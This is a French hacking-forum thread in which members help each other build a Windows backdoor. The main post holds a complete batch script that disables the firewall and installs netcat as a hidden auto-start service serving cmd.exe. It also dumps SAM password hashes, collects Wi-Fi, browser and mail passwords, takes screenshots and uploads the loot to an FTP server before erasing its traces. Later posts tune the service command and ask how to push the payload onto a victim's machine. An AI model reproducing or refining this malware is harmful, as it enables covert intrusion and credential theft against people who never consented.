Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#51 19-06-2010 09:25:44

Dack
Membre Irremplaçable
Inscription : 07-04-2009
Messages : 1 257

Re : Backdoor pour Noobz sous win

Merci pour le lien! Je vais le lire wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#52 19-06-2010 11:48:59

Re : Backdoor pour Noobz sous win

Veidam,

Tu fais comme tu le sens, soit tu postes directement ton code,
soit tu me l'envoies et avec ton autorisation je couperai les morceaux de codes les plus intéressants (en laissant des indices) pour pousser à la recherche et évité le travaille tout cuit.

Comme j'ai fais pour toi wink


crsh.jpg

Hors Ligne

#53 19-06-2010 13:06:37

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

salut [email protected] je viens de t'envoyer un courriel avec la source d'origine je t'enverrais dans la nuit les codes de mon exemple pour un aperçu du truc et demain je met le liens

c bon si tu nous fait un tuto sur ceci je serais le premier a en être ravi j'apprendrais surement encore beaucoup grâce a toi alors merci de ta proposition contacte moi si besoin sur mon mail jetable je vais le surveiller

@++

Hors Ligne

#54 04-07-2010 15:54:15

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

Salut !
J'ai pas tout compris, mais je progresse...
[email protected], la "ligne secrète", est-ce que c'est ça:

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

Je suis pas du tout sûr, mais bon...

Voici mon listing.bat:

@echo off

del l33t-*.vbs /a 
set atr=attrib +H +S          
set l337-1=l337-%ComputerName%.txt     
set l337-2=l337-%ComputerName%.html     
set start=start /B /MIN /wait       
set cr=echo +---------------+       
set ba=echo. ^& echo. __________________________________________________________ ^& ^echo. 

%atr% Win-maj.exe   
%atr% l337-*   
%atr% *.bat   

echo. & echo . VEUILLEZ PATIENTER ENVIRON 1 min . & echo. & echo. 

if Exist %l337-1% del %l337-1% /a 
if Exist %l337-2% del %l337-2% /a 

%start% netsh advfirewall set currentprofile state off   
If ERRORLEVEL == 1 Goto XP       
echo advfirewall currentprofile OFF     

ver         
echo Firewall windows down     
%start% netsh firewall set opmode disable  
goto suite  

:XP           
echo.           
echo Car elle ne s'applique qu'a VISTA et s7ven   
%start% netsh firewall set opmode disable    
ver            
echo Firewall windows down       
echo Ok           
echo.           

:SUITE 
(echo ---- LANCEMENT DU SERVEUR ----)     
xcopy /Y system.exe %SystemRoot%\System32   
attrib +H +S %SystemRoot%\System32\system.exe   

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto
sc.exe start SYSTEM               
echo le fichier system.exe se trouve dans %SystemRoot%\System32\     
del system.exe  

echo. & echo. & echo. & echo --- RECUPERATION DES INFOS --- & echo. 

(echo.                                                            
%cr% & echo +   RECUP SAM   + & %cr% & l337-sam1-bkreg.exe bkreg.key & l337-sam2-pwdump7exe & %ba%
%cr% & echo +  NBTSTAT -N   + & %cr% & nbtstat -n & %ba%
%cr% & echo + IPCONFIG /ALL + & %cr% & ipconfig /all & %ba%                                
%cr% & echo + TASKLIST ALL  + & %cr% & tasklist.exe & %ba%                                        
%cr% & echo +   TASKLIST    + & echo +  svchost.exe  + & %cr%
tasklist.exe /svc /fi "imagename eq svchost.exe" & %ba%) > %l337-1% & del bkreg.key

%start% l337-wirelesskeyview.exe /shtml wirelesskeyview.l337   
more wirelesskeyview.l337 > %l337-2% & del *.l337     

%start% l337-netrouteview.exe /shtml netrouteview.l337 
more netrouteview.l337 >> %l337-2% & del *.l337   

%start% l337-iepv.exe /shtml iepv.l337 
more iepv.l337 >> %l337-2% & del *.l337 

%start% l337-livecontactsview.exe /shtml livecontactsview.l337 
more livecontactsview.l337 >> %l337-2% & del *.l337 

%start% l337-mailpv.exe /shtml mailpv.l337 
more mailpv.l337 >> %l337-2% & del *.l337 

%start% l337-mspass.exe /shtml mspass.l337 
more mspass.l337 >> %l337-2% & del *.l337 

%start% l337-netpass.exe /shtml netpass.l337 
more netpass.l337 >> %l337-2% & del *.l337

%start% l337-netresview.exe /shtml netresview.l337 
more netresview.l337 >> %l337-2% & del *.l337  

%start% l337-passwordfox.exe /shtml passwordfox.l337 
more passwordfox.l337 >> %l337-2% & del *.l337 

%start% l337-produkey.exe /shtml produkey.l337 
more produkey.l337 >> %l337-2% & del *.l337

del l337-*.exe /a &%atr% %l337-1% & %atr% %l337-2% 

echo.           
echo . CREATION DU FICHIER "%l337-1%" ...... OK   
echo.           
echo . CREATION DU FICHIER "%l337-2%" ....... OK   
echo.           

:Erreurdeping       
ping google.com       
IF ERRORLEVEL==1 goto Erreurdeping   
echo ** le ping a reussi **  

(echo open ftp.***.fr & echo ***& echo ***& echo mput l337-* & echo bye) > ftp.txt 

ftp.exe -i -s:ftp.txt   

echo.         
echo . DELETE LES TRACES ........ OK   
echo         
del l337-* /a        

:Erreurdeping2       
ping google.fr       
IF ERRORLEVEL==1 goto Erreurdeping2   
echo ** le ping a reussi **     
for /L %%a in (1,1,3) do (     
echo essai %%a       

nircmd.exe loop 3 5000 savescreenshot scr_~$currdate.MM-dd-yyyy$_~$currtime.HH.mm.ss$s.pngL337         
(echo open ftp.***.fr & echo ***& echo ***& echo mput *.pngL337 & echo bye) > ftp.txt 
ftp.exe -i -s:ftp.txt                         

del *.pngL337      
ping google.com     
IF ERRORLEVEL==1 goto Erreurdeping2 
) 

del ftp.txt; nircmd.exe; Listing.bat /a

Est-il juste ? (je précise que j'ai écrit l337 et non l33t)
Merci d'avance... big_smile

Dernière modification par NachtSchwarz (04-07-2010 16:22:39)


forumlogo2.jpg

Hors Ligne

#55 04-07-2010 17:15:25

Re : Backdoor pour Noobz sous win

sc create SYSTEM binPath= c:\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

Il te manques 5% (tu l'as quasi trouvé)

ok je comprend pquoi tu del l33t dès le début (mais .vbs c'est inutile, vu que le reste est l337)

--> (echo ---- LANCEMENT DU SERVEUR ----)   <-- parenthèse inutile

sinon tout est juste


crsh.jpg

Hors Ligne

#56 04-07-2010 18:05:00

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

OK, merci beaucoup !
Je réfléchi à ces 5% !
(je te remercie doublement car cette expérience m'a permi de modifier une variable de la base de registre qui me bloquait l'accès aux fichiers cachés) wink

Dernière modification par NachtSchwarz (04-07-2010 19:11:14)


forumlogo2.jpg

Hors Ligne

#57 04-07-2010 19:07:24

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

EUH !
le truc, ça serait pas

sc create SYSTEM binPath= C:\WINDOWS\system32\system.exe -vv –d –L –p 3210 –e cmd.exe start= auto

???
Si c'est ça, je lol ! (c'est obligé^^)


forumlogo2.jpg

Hors Ligne

#59 04-07-2010 20:13:39

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

ok, merci pour cet indice wink
Je m'aide avec ceci:
http://support.microsoft.com/kb/251192

hmmmm...
serait-ce
sc create SYSTEM binpath= "%SystemRoot%\System32\system.exe -vv -d -L -p 3210 -e cmd.exe" start= auto error= ignore

Dernière modification par NachtSchwarz (04-07-2010 20:20:41)


forumlogo2.jpg

Hors Ligne

#60 04-07-2010 20:18:43

Re : Backdoor pour Noobz sous win

Comme c'est le we, c'est K-do:

error=normal, severe, critical, ignore
Gravité de l'erreur si le service ne démarre pas pendant le démarrage.
(valeur par défaut = normal)

1 chance sur 4 wink

[Edit:]  Oups, j'avais pas fait gaffe , mais oui c'est "ignore" (tu as réédité ton msg avec le code ? ou c'est moi qui hallu)

il te manque quand même une partie entre les deux :

binpath= "%SystemRoot% <-- on va pas tourner au tour du pot, vu que c'est un truc tout con et que tu as l'air de piger le truc, pense à une commande dos


crsh.jpg

Hors Ligne

#61 04-07-2010 20:31:47

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

Oui oui, j'ai edit big_smile
T'es normal !
donc y manque quelque chose entre binpath et "%SystemRoot% ?
Ok, je continue à chercher... wink

EDIT:

sc create SYSTEM binpath= "\"%SystemRoot%\System32\system.exe -vv -d -L -p 3210 -e cmd.exe"" start= auto error= ignore

Dernière modification par NachtSchwarz (04-07-2010 20:41:06)


forumlogo2.jpg

Hors Ligne

#62 05-07-2010 00:02:37

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Backdoor pour Noobz sous win

ah ça fait plaisir de voir quelqu'un s'intéresser a ce poste

Bienvenue NachtSchwarz mais si je peut me permettre ta backdoor ne marchera pas avec netcat si tu ne le paramètre pas en remote shell enfin si tu l'utilise en local ok mais pas en extérieur

sinon c bien d'alimenter ceci

@ plus

Hors Ligne

#63 05-07-2010 08:36:47

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

Salut Veidam !
Oui, je sais pour le reverse Shell (il y a quelques temps j'avais programmmé un trojan en python et j'avais été confronté au même problème). Je suis aussi en train de lire ton tuto smile


forumlogo2.jpg

Hors Ligne

#64 02-08-2010 13:04:28

NachtSchwarz
Membre
Lieu : /home/
Inscription : 25-06-2010
Messages : 15
Site Web

Re : Backdoor pour Noobz sous win

Juste un petit message comme ça, je suis très heureux que Crack-wpa soit de retour. Je vais de ce pas me remettre à cette backdoor, qui, me semble t-il, est pratiquemment finie (j'y est fait quelques modifs, histoire que ce soit fun wink ).
Merci à vous pour cet excellent forum.


forumlogo2.jpg

Hors Ligne

#65 23-01-2011 02:46:40

kiissme
N00b
Inscription : 01-07-2010
Messages : 2

Re : Backdoor pour Noobz sous win

J'ai un problème il envoi pas les données !
ce log va dans le bon fichier puis déconnecte donc je me suis connecté sur le Ftp avec le log pour voir si les droit sont bien mis et oui donc je vois pas d'ou cela viens !

Sinon il ce lance bien malgré qu'il ne sois pas du-tout discret (deux demande autorisation d'exe) wirlesskeyview,netpass et les fichiers créer comme les screen et autre ne sont pas cacher meme si ils sont effacer automatiquement !

Je suis sous win 7 et à la fin j'ai un message d'erreur qui dit :

 Script: C:\l33t.Start.vbs
Ligne: 5
Erreur : Cet objet ne gènere pas cette propriété ou cette méthode: "WScrpt.qui"
Code: 800A01B6
Source Erreur d'exécution Microsoft VBScript
Dim shell, commande
Set shell = WScript.CreateObject("WScript.Shell")
commande="Listing.bat"
shell.Run commande, 0,true
WScript.qui

Voila merci pour ce tuto instructif moi qui avais aucune connaissance en DoS
Je suis Aussi ton tuto sur Wifizoo mais je bloc sur certain points !
Déjà moi aircrack-ng me trouve une wep erroné genre( A1A1A1A1A1A1A1A1A1A1A1A1A1) donc peut pas choper la wep pour decripter mes paquets avec wifizoo et sionon si je met la box en opn et aidump-ng en focus dessus wifizoo dans l'onglet BSSiD je vois divers points ainsi que le mien mais je chope rien  malgré que je me connecte a divers sites gmail,hotmail,facebook ....

Merci de ton temp et ta passion dévorante smile

Dernière modification par kiissme (23-01-2011 02:56:22)

Hors Ligne

#66 01-02-2012 20:21:16

RipX
Membre
Inscription : 22-01-2012
Messages : 11

Re : Backdoor pour Noobz sous win

Hello tout le monde,

Merci beaucoup sur ce joli tuto qui m'a beaucoup apprit! J'ai suivi le déroulement des étapes, je ne pense pas avoir trop d'erreurs dans mon script puisque quand je le lance en local il fait bien ce qu'il est censé faire...j'ai tout compilé dans un seul .exe pour plus de simplicité avec "bat to exe converter"
Maintenant je cherche comment faire fonctionner netcat mais j'ai quelques soucis, pouvez-vous m'aider svp? Je ne comprends pas les lignes de codes malgré les nombreux tutos que j'ai lu (français et anglais) dessus.

Le déroulement est simple pourtant : lancement de netcat, scan des ports, connection, injection et enfin exécution de l'exe...

Merci de votre aide!


Outils carcking :
Acer Aspire One D150, Antenne externe avec chipset Realtek 8187L
Dual boot Seven + Backtrack 5 R1 et Wifite

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.106 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]